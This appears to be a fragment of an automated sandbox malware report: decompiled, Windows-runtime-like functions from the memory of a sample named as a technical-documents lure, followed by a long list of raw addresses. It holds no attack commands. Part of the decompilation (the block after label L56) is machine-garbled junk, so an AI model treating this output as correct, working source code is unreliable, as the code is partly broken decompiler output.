                                                  • Instruction ID: 83d7212b82ed71800bd8ae9310e98044e7e69a9a33f89d75c030a2a634dc2771
                                                  • Opcode Fuzzy Hash: bdf31a2ef1b7901a7b1f316acbe30a071434af6678447c68016fa979cdcecc37
                                                  • Instruction Fuzzy Hash: 2E3104322052159BCB229F19C98CB2AFBE5FF89B24F05055DE557CB245CB74DA04CBC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
                                                  			E017C0050(void* __ecx) {
                                                  				signed int _v8;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				intOrPtr* _t30;
                                                  				intOrPtr* _t31;
                                                  				signed int _t34;
                                                  				void* _t40;
                                                  				void* _t41;
                                                  				signed int _t44;
                                                  				intOrPtr _t47;
                                                  				signed int _t58;
                                                  				void* _t59;
                                                  				void* _t61;
                                                  				void* _t62;
                                                  				signed int _t64;
                                                  
                                                  				_push(__ecx);
                                                  				_v8 =  *0x189d360 ^ _t64;
                                                  				_t61 = __ecx;
                                                  				_t2 = _t61 + 0x20; // 0x20
                                                  				E017D9ED0(_t2, 1, 0);
                                                  				_t52 =  *(_t61 + 0x8c);
                                                  				_t4 = _t61 + 0x8c; // 0x8c
                                                  				_t40 = _t4;
                                                  				do {
                                                  					_t44 = _t52;
                                                  					_t58 = _t52 & 0x00000001;
                                                  					_t24 = _t44;
                                                  					asm("lock cmpxchg [ebx], edx");
                                                  					_t52 = _t44;
                                                  				} while (_t52 != _t44);
                                                  				if(_t58 == 0) {
                                                  					L7:
                                                  					_pop(_t59);
                                                  					_pop(_t62);
                                                  					_pop(_t41);
                                                  					return E017EB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                  				}
                                                  				asm("lock xadd [esi], eax");
                                                  				_t47 =  *[fs:0x18];
                                                  				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                  				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                  				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                  				if(_t30 != 0) {
                                                  					if( *_t30 == 0) {
                                                  						goto L4;
                                                  					}
                                                  					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  					L5:
                                                  					if( *_t31 != 0) {
                                                  						_t18 = _t61 + 0x78; // 0x78
                                                  						E01878A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                  					}
                                                  					_t52 =  *(_t61 + 0x5c);
                                                  					_t11 = _t61 + 0x78; // 0x78
                                                  					_t34 = E017D9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                  					_t24 = _t34 | 0xffffffff;
                                                  					asm("lock xadd [esi], eax");
                                                  					if((_t34 | 0xffffffff) == 0) {
                                                  						 *0x189b1e0(_t61);
                                                  						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                  					}
                                                  					goto L7;
                                                  				}
                                                  				L4:
                                                  				_t31 = 0x7ffe0386;
                                                  				goto L5;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: b160cd4d4389a72520174129176327c39690b780218b291eb8c8f6f6cb509acb
                                                  • Instruction ID: 9532907dc26aee4b1d3b410d567297ffbe412aa286d0ef0cacdaec2aa2f57027
                                                  • Opcode Fuzzy Hash: b160cd4d4389a72520174129176327c39690b780218b291eb8c8f6f6cb509acb
                                                  • Instruction Fuzzy Hash: 47318F35201B04CFD722CF28C844B56F7E5FF89714F1545ADE59687690EB35E901CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E017D2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                  				char _v3;
                                                  				signed int _v8;
                                                  				signed int _v16;
                                                  				unsigned int _v24;
                                                  				void* _v28;
                                                  				signed int _v32;
                                                  				unsigned int _v36;
                                                  				void* _v37;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				signed int _v48;
                                                  				signed int _v52;
                                                  				signed int _v56;
                                                  				intOrPtr _v60;
                                                  				signed int _v64;
                                                  				signed int _v68;
                                                  				signed int _v72;
                                                  				signed int _v76;
                                                  				signed int _v80;
                                                  				signed int _t235;
                                                  				signed int _t239;
                                                  				signed int _t245;
                                                  				signed int _t247;
                                                  				intOrPtr _t249;
                                                  				signed int _t252;
                                                  				signed int _t259;
                                                  				signed int _t262;
                                                  				signed int _t270;
                                                  				signed int _t276;
                                                  				signed int _t278;
                                                  				void* _t280;
                                                  				void* _t281;
                                                  				signed int _t282;
                                                  				unsigned int _t285;
                                                  				signed int _t289;
                                                  				intOrPtr* _t290;
                                                  				signed int _t291;
                                                  				signed int _t295;
                                                  				intOrPtr _t307;
                                                  				signed int _t316;
                                                  				signed int _t318;
                                                  				signed int _t319;
                                                  				signed int _t323;
                                                  				signed int _t324;
                                                  				signed int _t326;
                                                  				void* _t327;
                                                  				signed int _t328;
                                                  				signed int _t330;
                                                  				signed int _t333;
                                                  				void* _t334;
                                                  				void* _t336;
                                                  
                                                  				_t330 = _t333;
                                                  				_t334 = _t333 - 0x4c;
                                                  				_v8 =  *0x189d360 ^ _t330;
                                                  				_push(__ebx);
                                                  				_push(__esi);
                                                  				_push(__edi);
                                                  				_t323 = 0x189b2e8;
                                                  				_v56 = _a4;
                                                  				_v48 = __edx;
                                                  				_v60 = __ecx;
                                                  				_t285 = 0;
                                                  				_v80 = 0;
                                                  				asm("movsd");
                                                  				_v64 = 0;
                                                  				_v76 = 0;
                                                  				_v72 = 0;
                                                  				asm("movsd");
                                                  				_v44 = 0;
                                                  				_v52 = 0;
                                                  				_v68 = 0;
                                                  				asm("movsd");
                                                  				_v32 = 0;
                                                  				_v36 = 0;
                                                  				asm("movsd");
                                                  				_v16 = 0;
                                                  				_t336 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                                  				_t276 = 0x48;
                                                  				_t305 = 0 | _t336 == 0x00000000;
                                                  				_t316 = 0;
                                                  				_v37 = _t336 == 0;
                                                  				if(_v48 <= 0) {
                                                  					L16:
                                                  					_t45 = _t276 - 0x48; // 0x0
                                                  					__eflags = _t45 - 0xfffe;
                                                  					if(_t45 > 0xfffe) {
                                                  						_t324 = 0xc0000106;
                                                  						goto L32;
                                                  					} else {
                                                  						_t323 = L017C4620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
                                                  						_v52 = _t323;
                                                  						__eflags = _t323;
                                                  						if(_t323 == 0) {
                                                  							_t324 = 0xc0000017;
                                                  							goto L32;
                                                  						} else {
                                                  							 *(_t323 + 0x44) =  *(_t323 + 0x44) & 0x00000000;
                                                  							_t50 = _t323 + 0x48; // 0x48
                                                  							_t318 = _t50;
                                                  							_t305 = _v32;
                                                  							 *(_t323 + 0x3c) = _t276;
                                                  							_t278 = 0;
                                                  							 *((short*)(_t323 + 0x30)) = _v48;
                                                  							__eflags = _t305;
                                                  							if(_t305 != 0) {
                                                  								 *(_t323 + 0x18) = _t318;
                                                  								__eflags = _t305 - 0x1898478;
                                                  								 *_t323 = ((0 | _t305 == 0x01898478) - 0x00000001 & 0xfffffffb) + 7;
                                                  								E017EF3E0(_t318,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
                                                  								_t305 = _v32;
                                                  								_t334 = _t334 + 0xc;
                                                  								_t278 = 1;
                                                  								__eflags = _a8;
                                                  								_t318 = _t318 + (( *_t305 & 0x0000ffff) >> 1) * 2;
                                                  								if(_a8 != 0) {
                                                  									_t270 = E018339F2(_t318);
                                                  									_t305 = _v32;
                                                  									_t318 = _t270;
                                                  								}
                                                  							}
                                                  							_t289 = 0;
                                                  							_v16 = 0;
                                                  							__eflags = _v48;
                                                  							if(_v48 <= 0) {
                                                  								L31:
                                                  								_t324 = _v68;
                                                  								__eflags = 0;
                                                  								 *((short*)(_t318 - 2)) = 0;
                                                  								goto L32;
                                                  							} else {
                                                  								_t276 = _t323 + _t278 * 4;
                                                  								_v56 = _t276;
                                                  								do {
                                                  									__eflags = _t305;
                                                  									if(_t305 != 0) {
                                                  										_t235 =  *(_v60 + _t289 * 4);
                                                  										__eflags = _t235;
                                                  										if(_t235 == 0) {
                                                  											goto L30;
                                                  										} else {
                                                  											__eflags = _t235 == 5;
                                                  											if(_t235 == 5) {
                                                  												goto L30;
                                                  											} else {
                                                  												goto L22;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										L22:
                                                  										 *_t276 =  *(_v60 + _t289 * 4);
                                                  										 *(_t276 + 0x18) = _t318;
                                                  										_t239 =  *(_v60 + _t289 * 4);
                                                  										__eflags = _t239 - 8;
                                                  										if(__eflags > 0) {
                                                  											goto L56;
                                                  										} else {
                                                  											switch( *((intOrPtr*)(_t239 * 4 +  &M017D2959))) {
                                                  												case 0:
                                                  													__ax =  *0x1898488;
                                                  													__eflags = __ax;
                                                  													if(__ax == 0) {
                                                  														goto L29;
                                                  													} else {
                                                  														__ax & 0x0000ffff = E017EF3E0(__edi,  *0x189848c, __ax & 0x0000ffff);
                                                  														__eax =  *0x1898488 & 0x0000ffff;
                                                  														goto L26;
                                                  													}
                                                  													goto L118;
                                                  												case 1:
                                                  													L45:
                                                  													E017EF3E0(_t318, _v80, _v64);
                                                  													_t265 = _v64;
                                                  													goto L26;
                                                  												case 2:
                                                  													 *0x1898480 & 0x0000ffff = E017EF3E0(__edi,  *0x1898484,  *0x1898480 & 0x0000ffff);
                                                  													__eax =  *0x1898480 & 0x0000ffff;
                                                  													__eax = ( *0x1898480 & 0x0000ffff) >> 1;
                                                  													__edi = __edi + __eax * 2;
                                                  													goto L28;
                                                  												case 3:
                                                  													__eax = _v44;
                                                  													__eflags = __eax;
                                                  													if(__eax == 0) {
                                                  														goto L29;
                                                  													} else {
                                                  														__esi = __eax + __eax;
                                                  														__eax = E017EF3E0(__edi, _v72, __esi);
                                                  														__edi = __edi + __esi;
                                                  														__esi = _v52;
                                                  														goto L27;
                                                  													}
                                                  													goto L118;
                                                  												case 4:
                                                  													_push(0x2e);
                                                  													_pop(__eax);
                                                  													 *(__esi + 0x44) = __edi;
                                                  													 *__edi = __ax;
                                                  													__edi = __edi + 4;
                                                  													_push(0x3b);
                                                  													_pop(__eax);
                                                  													 *(__edi - 2) = __ax;
                                                  													goto L29;
                                                  												case 5:
                                                  													__eflags = _v36;
                                                  													if(_v36 == 0) {
                                                  														goto L45;
                                                  													} else {
                                                  														E017EF3E0(_t318, _v76, _v36);
                                                  														_t265 = _v36;
                                                  													}
                                                  													L26:
                                                  													_t334 = _t334 + 0xc;
                                                  													_t318 = _t318 + (_t265 >> 1) * 2 + 2;
                                                  													__eflags = _t318;
                                                  													L27:
                                                  													_push(0x3b);
                                                  													_pop(_t267);
                                                  													 *((short*)(_t318 - 2)) = _t267;
                                                  													goto L28;
                                                  												case 6:
                                                  													__ebx = "\\WWw\\WWw";
                                                  													__eflags = __ebx - "\\WWw\\WWw";
                                                  													if(__ebx != "\\WWw\\WWw") {
                                                  														_push(0x3b);
                                                  														_pop(__esi);
                                                  														do {
                                                  															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                  															E017EF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                  															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                  															__edi = __edi + __eax * 2;
                                                  															__edi = __edi + 2;
                                                  															 *(__edi - 2) = __si;
                                                  															__ebx =  *__ebx;
                                                  															__eflags = __ebx - "\\WWw\\WWw";
                                                  														} while (__ebx != "\\WWw\\WWw");
                                                  														__esi = _v52;
                                                  														__ecx = _v16;
                                                  														__edx = _v32;
                                                  													}
                                                  													__ebx = _v56;
                                                  													goto L29;
                                                  												case 7:
                                                  													 *0x1898478 & 0x0000ffff = E017EF3E0(__edi,  *0x189847c,  *0x1898478 & 0x0000ffff);
                                                  													__eax =  *0x1898478 & 0x0000ffff;
                                                  													__eax = ( *0x1898478 & 0x0000ffff) >> 1;
                                                  													__eflags = _a8;
                                                  													__edi = __edi + __eax * 2;
                                                  													if(_a8 != 0) {
                                                  														__ecx = __edi;
                                                  														__eax = E018339F2(__ecx);
                                                  														__edi = __eax;
                                                  													}
                                                  													goto L28;
                                                  												case 8:
                                                  													__eax = 0;
                                                  													 *(__edi - 2) = __ax;
                                                  													 *0x1896e58 & 0x0000ffff = E017EF3E0(__edi,  *0x1896e5c,  *0x1896e58 & 0x0000ffff);
                                                  													 *(__esi + 0x38) = __edi;
                                                  													__eax =  *0x1896e58 & 0x0000ffff;
                                                  													__eax = ( *0x1896e58 & 0x0000ffff) >> 1;
                                                  													__edi = __edi + __eax * 2;
                                                  													__edi = __edi + 2;
                                                  													L28:
                                                  													_t289 = _v16;
                                                  													_t305 = _v32;
                                                  													L29:
                                                  													_t276 = _t276 + 4;
                                                  													__eflags = _t276;
                                                  													_v56 = _t276;
                                                  													goto L30;
                                                  											}
                                                  										}
                                                  									}
                                                  									goto L118;
                                                  									L30:
                                                  									_t289 = _t289 + 1;
                                                  									_v16 = _t289;
                                                  									__eflags = _t289 - _v48;
                                                  								} while (_t289 < _v48);
                                                  								goto L31;
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                  					while(1) {
                                                  						L1:
                                                  						_t239 =  *(_v60 + _t316 * 4);
                                                  						if(_t239 > 8) {
                                                  							break;
                                                  						}
                                                  						switch( *((intOrPtr*)(_t239 * 4 +  &M017D2935))) {
                                                  							case 0:
                                                  								__ax =  *0x1898488;
                                                  								__eflags = __ax;
                                                  								if(__eflags != 0) {
                                                  									__eax = __ax & 0x0000ffff;
                                                  									__ebx = __ebx + 2;
                                                  									__eflags = __ebx;
                                                  									goto L53;
                                                  								}
                                                  								goto L14;
                                                  							case 1:
                                                  								L44:
                                                  								_t305 =  &_v64;
                                                  								_v80 = E017D2E3E(0,  &_v64);
                                                  								_t276 = _t276 + _v64 + 2;
                                                  								goto L13;
                                                  							case 2:
                                                  								__eax =  *0x1898480 & 0x0000ffff;
                                                  								__ebx = __ebx + __eax;
                                                  								__eflags = __dl;
                                                  								if(__eflags != 0) {
                                                  									__eax = 0x1898480;
                                                  									goto L90;
                                                  								}
                                                  								goto L14;
                                                  							case 3:
                                                  								__eax = E017BEEF0(0x18979a0);
                                                  								__eax =  &_v44;
                                                  								_push(__eax);
                                                  								_push(0);
                                                  								_push(0);
                                                  								_push(4);
                                                  								_push(L"PATH");
                                                  								_push(0);
                                                  								L67();
                                                  								__esi = __eax;
                                                  								_v68 = __esi;
                                                  								__eflags = __esi - 0xc0000023;
                                                  								if(__esi != 0xc0000023) {
                                                  									L10:
                                                  									__eax = E017BEB70(__ecx, 0x18979a0);
                                                  									__eflags = __esi - 0xc0000100;
                                                  									if(__eflags == 0) {
                                                  										_v44 = _v44 & 0x00000000;
                                                  										__eax = 0;
                                                  										_v68 = 0;
                                                  										goto L13;
                                                  									} else {
                                                  										__eflags = __esi;
                                                  										if(__esi < 0) {
                                                  											L32:
                                                  											_t213 = _v72;
                                                  											__eflags = _t213;
                                                  											if(_t213 != 0) {
                                                  												L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
                                                  											}
                                                  											_t214 = _v52;
                                                  											__eflags = _t214;
                                                  											if(_t214 != 0) {
                                                  												__eflags = _t324;
                                                  												if(_t324 < 0) {
                                                  													L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
                                                  													_t214 = 0;
                                                  												}
                                                  											}
                                                  											goto L36;
                                                  										} else {
                                                  											__eax = _v44;
                                                  											__ebx = __ebx + __eax * 2;
                                                  											__ebx = __ebx + 2;
                                                  											__eflags = __ebx;
                                                  											L13:
                                                  											_t285 = _v36;
                                                  											goto L14;
                                                  										}
                                                  									}
                                                  								} else {
                                                  									__eax = _v44;
                                                  									__ecx =  *0x1897b9c; // 0x0
                                                  									_v44 + _v44 =  *[fs:0x30];
                                                  									__ecx = __ecx + 0x180000;
                                                  									__eax = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                  									_v72 = __eax;
                                                  									__eflags = __eax;
                                                  									if(__eax == 0) {
                                                  										__eax = E017BEB70(__ecx, 0x18979a0);
                                                  										__eax = _v52;
                                                  										L36:
                                                  										_pop(_t317);
                                                  										_pop(_t325);
                                                  										__eflags = _v8 ^ _t330;
                                                  										_pop(_t277);
                                                  										return E017EB640(_t214, _t277, _v8 ^ _t330, _t305, _t317, _t325);
                                                  									} else {
                                                  										__ecx =  &_v44;
                                                  										_push(__ecx);
                                                  										_push(_v44);
                                                  										_push(__eax);
                                                  										_push(4);
                                                  										_push(L"PATH");
                                                  										_push(0);
                                                  										L67();
                                                  										__esi = __eax;
                                                  										_v68 = __eax;
                                                  										goto L10;
                                                  									}
                                                  								}
                                                  								goto L118;
                                                  							case 4:
                                                  								__ebx = __ebx + 4;
                                                  								goto L14;
                                                  							case 5:
                                                  								_t272 = _v56;
                                                  								if(_v56 != 0) {
                                                  									_t305 =  &_v36;
                                                  									_t274 = E017D2E3E(_t272,  &_v36);
                                                  									_t285 = _v36;
                                                  									_v76 = _t274;
                                                  								}
                                                  								if(_t285 == 0) {
                                                  									goto L44;
                                                  								} else {
                                                  									_t276 = _t276 + 2 + _t285;
                                                  								}
                                                  								goto L14;
                                                  							case 6:
                                                  								__eax =  *0x1895764 & 0x0000ffff;
                                                  								goto L53;
                                                  							case 7:
                                                  								__eax =  *0x1898478 & 0x0000ffff;
                                                  								__ebx = __ebx + __eax;
                                                  								__eflags = _a8;
                                                  								if(_a8 != 0) {
                                                  									__ebx = __ebx + 0x16;
                                                  									__ebx = __ebx + __eax;
                                                  								}
                                                  								__eflags = __dl;
                                                  								if(__eflags != 0) {
                                                  									__eax = 0x1898478;
                                                  									L90:
                                                  									_v32 = __eax;
                                                  								}
                                                  								goto L14;
                                                  							case 8:
                                                  								__eax =  *0x1896e58 & 0x0000ffff;
                                                  								__eax = ( *0x1896e58 & 0x0000ffff) + 2;
                                                  								L53:
                                                  								__ebx = __ebx + __eax;
                                                  								L14:
                                                  								_t316 = _t316 + 1;
                                                  								if(_t316 >= _v48) {
                                                  									goto L16;
                                                  								} else {
                                                  									_t305 = _v37;
                                                  									goto L1;
                                                  								}
                                                  								goto L118;
                                                  						}
                                                  					}
                                                  					L56:
                                                  					_t290 = 0x25;
                                                  					asm("int 0x29");
                                                  					asm("out 0x28, al");
                                                  					if(__eflags < 0) {
                                                  						asm("o16 sub [ebp+0x1], bh");
                                                  					}
                                                  					_t105 =  &_v3;
                                                  					 *_t105 = _v3 - _t276;
                                                  					__eflags =  *_t105;
                                                  					asm("loopne 0x29");
                                                  					if(__eflags < 0) {
                                                  						if (__eflags >= 0) goto L62;
                                                  					}
                                                  					if(__eflags < 0) {
                                                  						_t323 = _t323 + 1;
                                                  						__eflags = _t323;
                                                  					}
                                                  					_v3 = _v3 - _t276;
                                                  					_pop(_t280);
                                                  					 *_t290 =  *_t290 + 0x17d2894;
                                                  					_v3 = _v3 - _t318;
                                                  					 *(_t239 + 0x1f017d26 ^ 0x0201815b) =  *(_t239 + 0x1f017d26 ^ 0x0201815b) - 0x7d;
                                                  					_t326 = _t323 + _t323;
                                                  					__eflags = _t326;
                                                  					asm("daa");
                                                  					if(_t326 < 0) {
                                                  						_push(ds);
                                                  					}
                                                  					_v3 = _v3 - _t280;
                                                  					_t327 = _t326 - 1;
                                                  					_t113 =  &_v3;
                                                  					 *_t113 = _v3 - _t280;
                                                  					__eflags =  *_t113;
                                                  					asm("daa");
                                                  					if( *_t113 < 0) {
                                                  						asm("fcomp dword [ebx-0x7f]");
                                                  					}
                                                  					_pop(_t281);
                                                  					 *_t290 =  *_t290 + 0x17d28b4;
                                                  					 *_t290 =  *_t290 + 0xcccccccc;
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					asm("int3");
                                                  					_push(0x20);
                                                  					_push(0x187ff00);
                                                  					E017FD08C(_t281, _t318, _t327);
                                                  					_v44 =  *[fs:0x18];
                                                  					_t319 = 0;
                                                  					 *_a24 = 0;
                                                  					_t282 = _a12;
                                                  					__eflags = _t282;
                                                  					if(_t282 == 0) {
                                                  						_t245 = 0xc0000100;
                                                  					} else {
                                                  						_v8 = 0;
                                                  						_t328 = 0xc0000100;
                                                  						_v52 = 0xc0000100;
                                                  						_t247 = 4;
                                                  						while(1) {
                                                  							_v40 = _t247;
                                                  							__eflags = _t247;
                                                  							if(_t247 == 0) {
                                                  								break;
                                                  							}
                                                  							_t295 = _t247 * 0xc;
                                                  							_v48 = _t295;
                                                  							__eflags = _t282 -  *((intOrPtr*)(_t295 + 0x1781664));
                                                  							if(__eflags <= 0) {
                                                  								if(__eflags == 0) {
                                                  									_t262 = E017EE5C0(_a8,  *((intOrPtr*)(_t295 + 0x1781668)), _t282);
                                                  									_t334 = _t334 + 0xc;
                                                  									__eflags = _t262;
                                                  									if(__eflags == 0) {
                                                  										_t328 = E018251BE(_t282,  *((intOrPtr*)(_v48 + 0x178166c)), _a16, _t319, _t328, __eflags, _a20, _a24);
                                                  										_v52 = _t328;
                                                  										break;
                                                  									} else {
                                                  										_t247 = _v40;
                                                  										goto L72;
                                                  									}
                                                  									goto L80;
                                                  								} else {
                                                  									L72:
                                                  									_t247 = _t247 - 1;
                                                  									continue;
                                                  								}
                                                  							}
                                                  							break;
                                                  						}
                                                  						_v32 = _t328;
                                                  						__eflags = _t328;
                                                  						if(_t328 < 0) {
                                                  							__eflags = _t328 - 0xc0000100;
                                                  							if(_t328 == 0xc0000100) {
                                                  								_t291 = _a4;
                                                  								__eflags = _t291;
                                                  								if(_t291 != 0) {
                                                  									_v36 = _t291;
                                                  									__eflags =  *_t291 - _t319;
                                                  									if( *_t291 == _t319) {
                                                  										_t328 = 0xc0000100;
                                                  										goto L86;
                                                  									} else {
                                                  										_t307 =  *((intOrPtr*)(_v44 + 0x30));
                                                  										_t249 =  *((intOrPtr*)(_t307 + 0x10));
                                                  										__eflags =  *((intOrPtr*)(_t249 + 0x48)) - _t291;
                                                  										if( *((intOrPtr*)(_t249 + 0x48)) == _t291) {
                                                  											__eflags =  *(_t307 + 0x1c);
                                                  											if( *(_t307 + 0x1c) == 0) {
                                                  												L116:
                                                  												_t328 = E017D2AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
                                                  												_v32 = _t328;
                                                  												__eflags = _t328 - 0xc0000100;
                                                  												if(_t328 != 0xc0000100) {
                                                  													goto L79;
                                                  												} else {
                                                  													_t319 = 1;
                                                  													_t291 = _v36;
                                                  													goto L85;
                                                  												}
                                                  											} else {
                                                  												_t252 = E017B6600( *(_t307 + 0x1c));
                                                  												__eflags = _t252;
                                                  												if(_t252 != 0) {
                                                  													goto L116;
                                                  												} else {
                                                  													_t291 = _a4;
                                                  													goto L85;
                                                  												}
                                                  											}
                                                  										} else {
                                                  											L85:
                                                  											_t328 = E017D2C50(_t291, _a8, _t282, _a16, _a20, _a24, _t319);
                                                  											L86:
                                                  											_v32 = _t328;
                                                  											goto L79;
                                                  										}
                                                  									}
                                                  									goto L118;
                                                  								} else {
                                                  									E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                  									_v8 = 1;
                                                  									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                  									_t328 = _a24;
                                                  									_t259 = E017D2AE4( &_v36, _a8, _t282, _a16, _a20, _t328);
                                                  									_v32 = _t259;
                                                  									__eflags = _t259 - 0xc0000100;
                                                  									if(_t259 == 0xc0000100) {
                                                  										_v32 = E017D2C50(_v36, _a8, _t282, _a16, _a20, _t328, 1);
                                                  									}
                                                  									_v8 = _t319;
                                                  									E017D2ACB();
                                                  								}
                                                  							}
                                                  						}
                                                  						L79:
                                                  						_v8 = 0xfffffffe;
                                                  						_t245 = _t328;
                                                  					}
                                                  					L80:
                                                  					return E017FD0D1(_t245);
                                                  				}
                                                  				L118:
                                                  			}






















































                                                  0x017d2736
                                                  0x01815bc1
                                                  0x01815bc1
                                                  0x01815bc4
                                                  0x00000000
                                                  0x01815bca
                                                  0x01815bca
                                                  0x01815bcd
                                                  0x00000000
                                                  0x01815bd3
                                                  0x00000000
                                                  0x01815bd3
                                                  0x01815bcd
                                                  0x017d273c
                                                  0x017d273c
                                                  0x017d2742
                                                  0x017d2747
                                                  0x017d274a
                                                  0x017d274d
                                                  0x017d2750
                                                  0x00000000
                                                  0x017d2756
                                                  0x017d2756
                                                  0x00000000
                                                  0x017d2902
                                                  0x017d2908
                                                  0x017d290b
                                                  0x00000000
                                                  0x017d2911
                                                  0x017d291c
                                                  0x017d2921
                                                  0x00000000
                                                  0x017d2921
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2880
                                                  0x017d2887
                                                  0x017d288c
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2805
                                                  0x017d280a
                                                  0x017d2814
                                                  0x017d2816
                                                  0x00000000
                                                  0x00000000
                                                  0x017d281e
                                                  0x017d2821
                                                  0x017d2823
                                                  0x00000000
                                                  0x017d2829
                                                  0x017d2829
                                                  0x017d2831
                                                  0x017d283c
                                                  0x017d283e
                                                  0x00000000
                                                  0x017d283e
                                                  0x00000000
                                                  0x00000000
                                                  0x017d284e
                                                  0x017d2850
                                                  0x017d2851
                                                  0x017d2854
                                                  0x017d2857
                                                  0x017d285a
                                                  0x017d285c
                                                  0x017d285d
                                                  0x00000000
                                                  0x00000000
                                                  0x017d275d
                                                  0x017d2761
                                                  0x00000000
                                                  0x017d2767
                                                  0x017d276e
                                                  0x017d2773
                                                  0x017d2773
                                                  0x017d2776
                                                  0x017d2778
                                                  0x017d277e
                                                  0x017d277e
                                                  0x017d2781
                                                  0x017d2781
                                                  0x017d2783
                                                  0x017d2784
                                                  0x00000000
                                                  0x00000000
                                                  0x01815bd8
                                                  0x01815bde
                                                  0x01815be4
                                                  0x01815be6
                                                  0x01815be8
                                                  0x01815be9
                                                  0x01815bee
                                                  0x01815bf8
                                                  0x01815bff
                                                  0x01815c01
                                                  0x01815c04
                                                  0x01815c07
                                                  0x01815c0b
                                                  0x01815c0d
                                                  0x01815c0d
                                                  0x01815c15
                                                  0x01815c18
                                                  0x01815c1b
                                                  0x01815c1b
                                                  0x01815c1e
                                                  0x00000000
                                                  0x00000000
                                                  0x017d28c3
                                                  0x017d28c8
                                                  0x017d28d2
                                                  0x017d28d4
                                                  0x017d28d8
                                                  0x017d28db
                                                  0x01815c26
                                                  0x01815c28
                                                  0x01815c2d
                                                  0x01815c2d
                                                  0x00000000
                                                  0x00000000
                                                  0x01815c34
                                                  0x01815c36
                                                  0x01815c49
                                                  0x01815c4e
                                                  0x01815c54
                                                  0x01815c5b
                                                  0x01815c5d
                                                  0x01815c60
                                                  0x017d2788
                                                  0x017d2788
                                                  0x017d278b
                                                  0x017d278e
                                                  0x017d278e
                                                  0x017d278e
                                                  0x017d2791
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2756
                                                  0x017d2750
                                                  0x00000000
                                                  0x017d2794
                                                  0x017d2794
                                                  0x017d2795
                                                  0x017d2798
                                                  0x017d2798
                                                  0x00000000
                                                  0x017d2734
                                                  0x017d272c
                                                  0x017d2700
                                                  0x017d25ef
                                                  0x017d25ef
                                                  0x017d25ef
                                                  0x017d25f2
                                                  0x017d25f8
                                                  0x00000000
                                                  0x00000000
                                                  0x017d25fe
                                                  0x00000000
                                                  0x017d28e6
                                                  0x017d28ec
                                                  0x017d28ef
                                                  0x017d28f5
                                                  0x017d28f8
                                                  0x017d28f8
                                                  0x00000000
                                                  0x017d28f8
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2866
                                                  0x017d2866
                                                  0x017d2876
                                                  0x017d2879
                                                  0x00000000
                                                  0x00000000
                                                  0x017d27e0
                                                  0x017d27e7
                                                  0x017d27e9
                                                  0x017d27eb
                                                  0x01815afd
                                                  0x00000000
                                                  0x01815afd
                                                  0x00000000
                                                  0x00000000
                                                  0x017d2633
                                                  0x017d2638
                                                  0x017d263b
                                                  0x017d263c
                                                  0x017d263e
                                                  0x017d2640
                                                  0x017d2642
                                                  0x017d2647
                                                  0x017d2649
                                                  0x017d264e
                                                  0x017d2650
                                                  0x017d2653
                                                  0x017d2659
                                                  0x017d26a2
                                                  0x017d26a7
                                                  0x017d26ac
                                                  0x017d26b2
                                                  0x01815b11
                                                  0x01815b15
                                                  0x01815b17
